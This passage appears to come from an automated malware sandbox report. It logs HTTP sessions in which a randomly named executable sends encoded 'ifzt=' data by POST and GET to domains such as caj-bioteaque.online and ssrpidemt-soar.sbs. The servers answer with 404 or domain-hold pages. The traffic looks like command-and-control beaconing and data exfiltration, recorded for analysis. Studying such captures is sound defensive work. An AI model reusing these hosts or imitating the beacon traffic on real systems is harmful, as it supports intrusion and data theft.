                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 55 64 74 47 73 56 70 46 49 53 2b 7a 49 74 39 49 74 4c 77 41 37 68 2b 30 52 59 44 4d 37 48 62 49 4a 58 46 73 6a 39 32 61 37 4f 32 68 46 57 2f 61 30 70 66 2f 44 75 59 33 2f 39 50 6b 58 4e 54 4e 56 4a 52 54 2f 2f 36 59 6d 70 36 51 59 44 77 39 52 76 4d 78 35 6e 6c 2f 46 6e 35 65 77 45 33 5a 44 36 59 31 48 56 76 78 49 59 43 56 41 43 5a 77 65 4f 49 71 4f 49 53 4f 55 7a 32 6b 34 72 67 6f 56 39 4c 2f 70 79 73 35 62 31 79 49 53 6e 32 78 54 70 57 6b 58 49 61 74 38 4e 6f 2f 62 78 41 61 2f 57 54 62 4b 7a 36 4b 39 4b 79 66 72 71 76 32 79 59 73 39 4c 79 50 51 6a 68 44 72 49 69 33 68 45 38 66 50 4f 69 72 2f 2b 32 51 74 70 50 74 6d 70 4f 6a 70 39 6f 38 3d
                                                                                                                                                Data Ascii: ifzt=UdtGsVpFIS+zIt9ItLwA7h+0RYDM7HbIJXFsj92a7O2hFW/a0pf/DuY3/9PkXNTNVJRT//6Ymp6QYDw9RvMx5nl/Fn5ewE3ZD6Y1HVvxIYCVACZweOIqOISOUz2k4rgoV9L/pys5b1yISn2xTpWkXIat8No/bxAa/WTbKz6K9Kyfrqv2yYs9LyPQjhDrIi3hE8fPOir/+2QtpPtmpOjp9o8=
                                                                                                                                                Nov 25, 2024 09:43:37.476222992 CET670INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 09:04:26 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e874-36b"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                                                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                15192.168.2.449842212.123.41.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:38.860346079 CET10906OUTPOST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 55 64 74 47 73 56 70 46 49 53 2b 7a 49 74 39 49 74 4c 77 41 37 68 2b 30 52 59 44 4d 37 48 62 49 4a 58 46 73 6a 39 32 61 37 4f 2b 68 45 6a 6a 61 79 4b 33 2f 41 75 59 33 31 64 50 6e 58 4e 53 58 56 4a 4a 58 2f 2f 33 74 6d 73 2b 51 5a 67 34 39 47 72 51 78 69 58 6c 2f 48 6e 35 6c 30 45 33 41 44 36 49 78 48 56 2f 78 49 59 43 56 41 44 70 77 5a 61 6b 71 49 49 53 50 44 44 32 6f 38 72 67 41 56 35 66 76 70 79 70 4f 62 46 53 49 53 48 6d 78 52 62 4f 6b 52 59 61 76 35 4e 6f 6e 62 78 4d 42 2f 56 32 71 4b 77 6d 67 39 49 75 66 39 4d 2b 62 71 6f 73 51 5a 43 2f 51 35 68 37 2b 4e 6c 66 78 44 4f 76 6b 65 77 62 68 6d 6b 45 32 30 66 34 54 38 76 6a 64 6e 76 36 38 66 78 46 48 45 54 61 50 74 70 46 56 6d 4e 4b 61 50 48 52 45 54 52 45 5a 37 33 33 46 38 45 39 72 6f 58 77 41 43 55 44 47 67 79 44 67 52 38 73 46 75 4c 32 51 33 42 61 44 38 43 5a 37 72 64 6b 71 6b 6f 39 39 57 6e 52 64 79 6c 34 55 30 58 6a 32 6f 48 77 4f 43 47 2b 70 61 63 36 6a 34 44 65 70 61 34 62 72 39 36 32 6a 2f 37 30 43 46 65 69 58 4c 33 53 79 65 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=UdtGsVpFIS+zIt9ItLwA7h+0RYDM7HbIJXFsj92a7O+hEjjayK3/AuY31dPnXNSXVJJX//3tms+QZg49GrQxiXl/Hn5l0E3AD6IxHV/xIYCVADpwZakqIISPDD2o8rgAV5fvpypObFSISHmxRbOkRYav5NonbxMB/V2qKwmg9Iuf9M+bqosQZC/Q5h7+NlfxDOvkewbhmkE20f4T8vjdnv68fxFHETaPtpFVmNKaPHRETREZ733F8E9roXwACUDGgyDgR8sFuL2Q3BaD8CZ7rdkqko99WnRdyl4U0Xj2oHwOCG+pac6j4Depa4br962j/70CFeiXL3SyertOO6gBJepeCZC8m/xnXOf34Eni5A/AVeFtNfDVlLg+MVPndpc6pRYpELMUqYJwY08dtOICUL8ryTXLvtJwEWxs8UiPw4heMq046IGG3P6/rRyFfP/rBya9FNNYJ5/qQipMLyRICjukxSs/t1r/nnW99OYNV7Re5ezU3Di5hroMwXswHjongZrZwfNRAZ14A9U6jklumjbEb9T+gRhkAJt24ZCUpsyxog34ZMvB6aOdJMKr1z+VwVBOyuoVblhcY3MJ+S1C/aYuGtRTUZL2JOlAijzjIASPh6mQQVMbBptSpJB3BEgwYwkXVp3AgP/Tg2kbtUMLlqmz5u/5Pi8gOEfaqvdT1ed/Z9A+BXiciJUSxirF2AWLJD59HW8AZv1LlhO06v+42ZpVE93H22A/WF/Pq4fkr45f6XNjpRIcOq4DQeXNNodEfaQQelROcVJBqGrM6hvUwxSNyFO4EQv9VQCetO2K6ykMZgBpGgq4w6saCZL9rirgC14DriplfXIYF9ahNOrlmJblrVKAoNq9fIuy4tSEU/6PZ3hXhBbIm3RUBZMpc6bVs3rLiOcYCfc3g3ID0/z9QjfUL3oiqbCUe6zeuGzTwWPofshP4OjsHb/zcjM8RZht/KQTocnOYeFN5K1hNDEB6iEqJDJjyzdUA46eg9JllcJM+Vv [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:43:40.150520086 CET670INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 08:40:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e7ed-36b"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                                                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                16192.168.2.449848212.123.41.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:41.982048035 CET524OUTGET /i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:43.245337963 CET1047INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 09:04:31 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 875
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "5d07e874-36b"
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6f 6e 20 68 6f 6c 64 20 70 65 6e 64 69 6e 67 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Verification of Contact Information</h1><p>The domain is temporarily on hold pending verification of the email address of the Registrant as per the ICANN rules on Verification of Contact Information.</p><p>More details of these rules can be found at:<br/><a href="http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification">http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification</a>.</p><p>If you are the owner of this domain please contact your provider and request re-verification or follow the instructions emailed to you shortly after your order.</p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                17192.168.2.449864172.67.223.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:48.742036104 CET798OUTPOST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 56 54 77 45 58 2f 49 53 48 79 68 61 72 5a 55 31 4c 34 51 70 45 47 4f 74 66 37 6b 72 68 59 32 4d 45 6e 53 71 4d 67 48 5a 6b 6b 72 62 55 44 79 4c 49 62 39 5a 56 62 31 31 7a 55 53 77 61 6c 31 30 68 68 36 70 69 45 36 6f 62 37 2b 39 33 62 45 2b 51 68 4a 68 30 35 33 55 68 4d 64 48 57 2b 67 67 4a 56 49 61 42 53 4a 34 68 58 6a 54 78 36 50 6c 7a 6d 55 35 72 76 31 75 71 73 69 49 47 66 6f 75 31 79 62 44 54 72 54 6c 2f 63 71 6d 69 67 2f 2f 72 5a 45 53 33 52 63 6e 52 71 31 33 35 4a 6f 41 33 37 55 34 58 39 6e 70 48 6d 2b 79 6c 43 2b 44 6c 34 6a 2b 70 33 48 42 6a 61 75 49 2b 4b 78 49 41 3d 3d
                                                                                                                                                Data Ascii: ifzt=8VTwEX/ISHyharZU1L4QpEGOtf7krhY2MEnSqMgHZkkrbUDyLIb9ZVb11zUSwal10hh6piE6ob7+93bE+QhJh053UhMdHW+ggJVIaBSJ4hXjTx6PlzmU5rv1uqsiIGfou1ybDTrTl/cqmig//rZES3RcnRq135JoA37U4X9npHm+ylC+Dl4j+p3HBjauI+KxIA==
                                                                                                                                                Nov 25, 2024 09:43:50.074935913 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:49 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81xz05wKBT8Sl3SDWGNOdJn3MEcAMR0YwyOAfEgaqQbqFjqufv7zUcOmtkAQzo%2B3h9ExqowD0uIZFUHzVD7ktSeil5IOY5T5TcMPgX3intnXJq34sAcETHA5a2PakdwPW2Q3cTmxqjKO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a738b624243-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2309&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                                Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`5
                                                                                                                                                Nov 25, 2024 09:43:50.074956894 CET342INData Raw: ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52 7d dd dd db
                                                                                                                                                Data Ascii: \Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[+


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                18192.168.2.449872172.67.223.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:51.404033899 CET818OUTPOST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 56 54 77 45 58 2f 49 53 48 79 68 61 4c 70 55 36 49 41 51 68 45 47 4e 7a 50 37 6b 39 52 5a 39 4d 45 72 53 71 4a 41 74 59 53 30 72 61 31 7a 79 4b 4a 62 39 58 31 62 31 2b 54 55 58 75 71 6c 38 30 68 6c 79 70 67 67 36 6f 62 76 2b 39 33 72 45 2b 6e 4e 47 67 6b 35 50 50 52 4d 66 4a 32 2b 67 67 4a 56 49 61 48 2f 42 34 68 66 6a 51 43 69 50 6a 69 6d 58 6e 62 76 36 70 71 73 69 4d 47 66 73 75 31 79 74 44 53 33 74 6c 35 41 71 6d 6a 77 2f 36 71 5a 62 4c 48 51 58 71 78 71 6a 6d 49 56 67 49 46 37 66 6c 78 6c 46 33 48 57 50 36 44 50 6b 53 55 5a 30 73 70 54 30 63 6b 54 61 46 39 33 34 54 45 42 63 4d 73 34 46 39 33 64 46 43 6d 6d 31 58 47 72 58 69 51 77 3d
                                                                                                                                                Data Ascii: ifzt=8VTwEX/ISHyhaLpU6IAQhEGNzP7k9RZ9MErSqJAtYS0ra1zyKJb9X1b1+TUXuql80hlypgg6obv+93rE+nNGgk5PPRMfJ2+ggJVIaH/B4hfjQCiPjimXnbv6pqsiMGfsu1ytDS3tl5Aqmjw/6qZbLHQXqxqjmIVgIF7flxlF3HWP6DPkSUZ0spT0ckTaF934TEBcMs4F93dFCmm1XGrXiQw=
                                                                                                                                                Nov 25, 2024 09:43:52.763998032 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:52 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbCixQaEzHN9xIhIJBUogLDHdf4H77tAXBf%2BB0ouOOe%2BwsDDZmd5glId0gl9hG6i%2FEg1vSZsC5sssPf3emtV3r%2F6xSzPKAzaJPcL73LHjT%2Bvitkzeooq4f%2BU7U1P6yPgmYUpPT713ZSu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a8479ee42c2-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2062&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                                Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                                                                                                                                                Nov 25, 2024 09:43:52.764067888 CET349INData Raw: 9c 03 f4 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2
                                                                                                                                                Data Ascii: ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                19192.168.2.449881172.67.223.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:54.086210012 CET10900OUTPOST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
